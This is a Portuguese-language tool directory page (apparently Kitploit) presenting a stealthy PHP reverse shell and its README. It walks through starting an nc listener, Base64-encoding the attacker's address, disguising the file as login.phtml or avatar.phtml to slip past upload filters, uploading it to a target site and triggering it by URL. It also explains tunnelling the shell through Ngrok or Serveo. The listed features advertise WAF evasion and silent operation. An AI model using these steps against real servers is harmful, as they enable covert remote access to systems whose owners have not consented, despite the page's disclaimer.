Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PHP-REVERSE-SHELL — Este é um poderoso e furtivo PHP reverse shell projetado para ethical hacking e testes de penetração. Ele estabelece uma conexão confiável e silenciosa de volta para sua máquina. | Kitploit
Ferramentas/GitLabGitLab/s_r_e_e_r_a_j/php-reverse-shell
Geração de PayloadsEvasão de IDS/IPSExploração de Aplicações WebBypass de WAFTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed TeamingFerramenta de Acesso Remoto

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitLabs_r_e_e_r_a_j/php-reverse-shell

PHP-REVERSE-SHELL

Este é um poderoso e furtivo PHP reverse shell projetado para ethical hacking e testes de penetração. Ele estabelece uma conexão confiável e silenciosa de volta para sua máquina.

Ver Repositório
1há 11 mesesAinda não revisado

PHP Reverse Shell (Poderosa e Furtiva)

Esta é uma shell reversa PHP poderosa e furtiva, projetada para testes de penetração e hacking ético. Ela estabelece uma conexão confiável e silenciosa de volta à sua máquina.

⚠️ Aviso Legal

Esta shell reversa PHP foi desenvolvida estritamente para fins educacionais e de teste de penetração autorizado.
O desenvolvedor não se responsabiliza por qualquer uso indevido, dano ou atividade ilegal realizada com esta reverse_shell.
Use com responsabilidade e apenas em sistemas que você possui ou tem permissão explícita para testar. O acesso não autorizado é ilegal e punível por lei.

Funcionalidades

  • IP e comando shell são codificados em Base64 para furtividade

  • Nomes de funções são invertidos para contornar WAF e filtros de segurança

  • Modo silencioso — nenhuma saída exibida para evitar detecção

  • Reconecta automaticamente se a conexão cair

  • Pode ser executado como daemon em segundo plano (se o servidor suportar)

  • Funciona na maioria dos servidores com PHP habilitado

  • Suporta serviços de tunelamento como Ngrok, Serveo

  • Faça upload com extensão .phtml para contornar alguns filtros

Como Usar

1. Inicie um listener na sua máquina

root@kitploit:~
nc -lvnp 4444

2. Codifique seu IP ou hostname em Base64

Use este comando simples:

root@kitploit:~
echo "seu_ip_ou_hostname" | base64

Exemplo:

root@kitploit:~
echo "192.168.1.5" | base64

Copie a saída e substitua o valor $ip_b64 no script da shell reversa PHP.

3. Atualize seu script de shell reversa PHP:

Altere estas linhas com seu IP/hostname codificado em Base64 e porta:

root@kitploit:~
$ip_b64 = 'SEU_IP_OU_HOSTNAME_CODIFICADO_EM_BASE64';
$port = SUA_PORTA_DO_LISTENER;

4. Renomeie o arquivo e faça upload

Renomeie o arquivo para algo menos suspeito, por exemplo:

  • login.phtml

  • avatar.phtml

  • update.phtml

Usar a extensão .phtml ajuda o arquivo a ser executado em alguns servidores que bloqueiam .php.

Faça upload deste arquivo no site alvo onde uploads são permitidos.

5. Dispare a shell reversa

Abra o arquivo enviado em um navegador:

root@kitploit:~
http://target.com/uploads/login.phtml

Uma vez aberto, seu listener receberá uma conexão de shell reversa.

Usando Tunelamento (Quando Seu IP Não é Público)

Se você está usando dados móveis ou atrás de um roteador (NAT), seu IP pode não ser público. Nesse caso, a shell reversa não consegue alcançar sua máquina diretamente.

Para corrigir isso, use ferramentas de tunelamento TCP como Ngrok ou Serveo.

Ngrok (Recomendado)

Instale o Ngrok
Execute este comando:

root@kitploit:~
ngrok tcp 4444

Ele exibirá algo como:

root@kitploit:~
Forwarding tcp://4.tcp.ngrok.io:18900

Atualize seu script de shell reversa PHP:

root@kitploit:~
$ip_b64 = base64_encoded of 4.tcp.ngrok.io;
$port = 18900;

Inicie seu listener:

root@kitploit:~
nc -lvnp 4444

Serveo

Execute este comando:

root@kitploit:~
ssh -R 0:localhost:4444 serveo.net

Ele dirá algo como:

root@kitploit:~
Forwarding TCP connections from serveo.net:46603

Atualize seu script de shell reversa PHP:

root@kitploit:~
$ip_b64 = base64_encoded of serveo.net;
$port = 46603;

Inicie seu listener:

root@kitploit:~
nc -lvnp 4444

Licença

Este projeto está licenciado sob a GNU General Public License v3.0

Baixar ferramenta